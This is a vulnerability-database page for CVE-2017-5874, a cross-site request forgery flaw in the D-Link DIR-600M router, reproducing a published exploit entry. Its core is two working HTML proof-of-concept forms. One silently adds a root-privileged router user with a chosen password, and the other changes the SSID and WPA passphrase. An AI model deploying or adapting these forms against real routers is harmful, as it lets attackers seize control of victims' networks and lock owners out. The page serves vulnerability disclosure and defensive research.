D-Link DIR-600M - Cross-Site Request Forgery

🗓️ 10 Feb 2017 00:00:00Reported by Ajay S. KulalType

D-link DIR-600M - Cross-Site Request Forgery (CSRF) vulnerability allows unauthorized actions on authenticated router

Reporter	Title	Published	Views	Family All 9
CNVD	D-Link DIR-600M Rev. Cx Cross-Site Request Forgery Vulnerability	24 Mar 201700:00	–	cnvd
CVE	CVE-2017-5874	22 Mar 201705:31	–	cve
Cvelist	CVE-2017-5874	22 Mar 201705:31	–	cvelist
EUVD	EUVD-2017-14949	7 Oct 202500:30	–	euvd
exploitpack	D-Link DIR-600M - Cross-Site Request Forgery	10 Feb 201700:00	–	exploitpack
NVD	CVE-2017-5874	22 Mar 201705:59	–	nvd
OSV	CVE-2017-5874	22 Mar 201705:59	–	osv
Prion	Authentication flaw	22 Mar 201705:59	–	prion
Positive Technologies	PT-2017-16726 · D Link · Dir-600M	22 Mar 201700:00	–	ptsecurity

# Exploit Title:D-link wireless router DIR-600M – Cross-Site Request Forgery (CSRF) vulnerability
# Google Dork:N/A
# Date: 07/02/2017
# Exploit Author:Ajay S. Kulal (www.twitter.com/ajay_kulal)
# Vendor Homepage:dlink.com
# Software Link:N/A
# Version:Hardware version: C1  
          Firmware version: 3.03
# Tested on:All Platforms
# CVE :CVE-2017-5874

Abstract:
=======
 
Cross-Site Request Forgery (CSRF) vulnerability in the DIR-600M wireless router enables an attacker 
to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
 
 
Exploitation-Technique:
===================
Remote
 
Severity Rating:
===================
 
7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C)

Details:
=======
An attacker who lures a DIR-600M authenticated user to browse a malicious website 
can exploit cross site request forgery (CSRF) to add new admin, change wifi password and to change other network settings.
 
Proof Of Concept code:
====================
 
1. Add new user with root access

 <html>
   <!-- CSRF PoC - by Ajay Kulal -->
   <body>
     <form action="http://192.168.0.1/form2userconfig.cgi" method="POST">
       <input type="hidden" name="username" value="AK" />
       <input type="hidden" name="privilege" value="2" />
       <input type="hidden" name="newpass" value="dolphin" />
       <input type="hidden" name="confpass" value="dolphin" />
       <input type="hidden" name="adduser" value="Add" />
       <input type="hidden" name="hiddenpass" value="" />
       <input type="hidden" name="submit&#46;htm&#63;userconfig&#46;htm" value="Send" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
 </html>




2. changing wireless password

 <html>
   <!-- CSRF PoC - by Ajay Kulal -->
   <body>
     <form action="http://192.168.0.1/form2WlanBasicSetup.cgi" method="POST">
       <input type="hidden" name="domain" value="1" />
       <input type="hidden" name="hiddenSSID" value="on" />
       <input type="hidden" name="ssid" value="Dravidian" />
       <input type="hidden" name="band" value="10" />
       <input type="hidden" name="chan" value="0" />
       <input type="hidden" name="chanwid" value="1" />
       <input type="hidden" name="txRate" value="0" />
       <input type="hidden" name="method&#95;cur" value="0" />
       <input type="hidden" name="method" value="2" />
       <input type="hidden" name="authType" value="2" />
       <input type="hidden" name="length" value="1" />
       <input type="hidden" name="format" value="2" />
       <input type="hidden" name="defaultTxKeyId" value="1" />
       <input type="hidden" name="key1" value="0000000000" />
       <input type="hidden" name="pskFormat" value="0" />
       <input type="hidden" name="pskValue" value="password123" />
       <input type="hidden" name="checkWPS2" value="1" />
       <input type="hidden" name="save" value="Apply" />
       <input type="hidden" name="basicrates" value="15" />
       <input type="hidden" name="operrates" value="4095" />
       <input type="hidden" name="submit&#46;htm&#63;wlan&#95;basic&#46;htm" value="Send" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
 </html>

10 Feb 2017 00:00Current

8.9High risk

Vulners AI Score8.9

CVSS 26.8

CVSS 38.8

EPSS0.00096